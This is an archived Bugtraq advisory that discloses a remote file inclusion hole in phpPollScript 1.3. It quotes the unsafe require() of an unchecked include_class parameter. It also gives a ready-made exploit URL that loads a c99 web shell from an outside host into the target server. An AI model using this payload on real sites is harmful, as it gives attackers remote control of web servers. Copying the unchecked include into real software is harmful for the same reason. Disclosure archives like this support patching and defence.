[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpPollScript - 1.3 Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpPollScript - 1.3 Remote File Include
From: admin@xxxxxxxxxx
Date: 20 Dec 2009 11:43:25 -0000

#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  ZZxxHackerzzXX 
#Contact              :  admin@xxxxxxxxxx
#Location             :  Turkey
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
########################################################################
#eser@xxxxxxxxxx (all crew shell)
########################################################################

Follow-Ups:
- Re: phpPollScript - 1.3 Remote File Include
  - From: Packet Storm

Prev by Date: [ GLSA 200912-02 ] Ruby on Rails: Multiple vulnerabilities
Next by Date: pragmaMx CMS Blind SQL/XPath Injection vulnerability
Previous by thread: [ GLSA 200912-02 ] Ruby on Rails: Multiple vulnerabilities
Next by thread: Re: phpPollScript - 1.3 Remote File Include
Index(es):
- Date
- Thread